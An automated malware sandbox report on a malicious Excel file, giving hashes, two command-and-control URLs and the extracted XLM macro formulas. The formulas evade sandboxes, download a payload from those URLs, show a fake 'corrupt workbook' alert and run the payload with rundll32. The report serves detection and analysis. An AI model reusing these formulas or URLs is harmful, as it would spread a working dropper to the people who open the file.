General

  • Target

  • Size

    192KB

  • MD5

    bf1efbdca05fab7682b9da5b800c2d4c

  • SHA1

    e57949811523eed8ab9321394a537bb909eaa7e7

  • SHA256

    5af3bdbe31bf60ddc4bd101f4bee6e843a58450b4d39c8a12ce58135ec4b1b19

  • SHA512

    4ba1b206c2085926972d87d044b770394443b129e707c8f396725597b36a9cb4f7be5de7a9026d579331d6af5a3365d74e3cfe1148420010a2625c7681ed8b07

Score
10/10
xlm

Malware Config

Extracted

Rule Excel 4.0 XLM Macro
C2

https://gameaze.com/wp-content/themes/wp_data.php

https://friendoffishing.com/wp-content/themes/calliope/template-parts/wp_data.php

Attributes
formulas
=IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),) =IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),) =IF(GET.WORKSPACE(19),,CLOSE(TRUE)) =IF(GET.WORKSPACE(42),,CLOSE(TRUE)) =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE)) ="C:\Users\"&GET.WORKSPACE(26)&"\AppData\Local\Temp\"&RANDBETWEEN(1,9999)&".reg" ="EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security "&R[-1]C&" /y" =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",R[-1]C,0,5) =WAIT(NOW()+"00:00:03") =FOPEN(R[-4]C) =FPOS(R[-1]C,215) =FREAD(R[-2]C,255) =FCLOSE(R[-3]C) =FILE.DELETE(R[-8]C) =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),) ="C:\Users\"&GET.WORKSPACE(26)&"\AppData\Local\Temp\CVR"&RANDBETWEEN(1000,9999)&".tmp.cvr" ="https://gameaze.com/wp-content/themes/wp_data.php" ="https://friendoffishing.com/wp-content/themes/calliope/template-parts/wp_data.php" =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-2]C,R[-3]C,0,0) =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-2]C,R[-4]C,0,0),) =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2) =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe",R[-6]C&",DllRegisterServer",0,5) =CLOSE(FALSE) =GOTO(Y1)

Signatures

Files

  • 5af3bdbe31bf60ddc4bd101f4bee6e843a58450b4d39c8a12ce58135ec4b1b19
    .xls windows office2003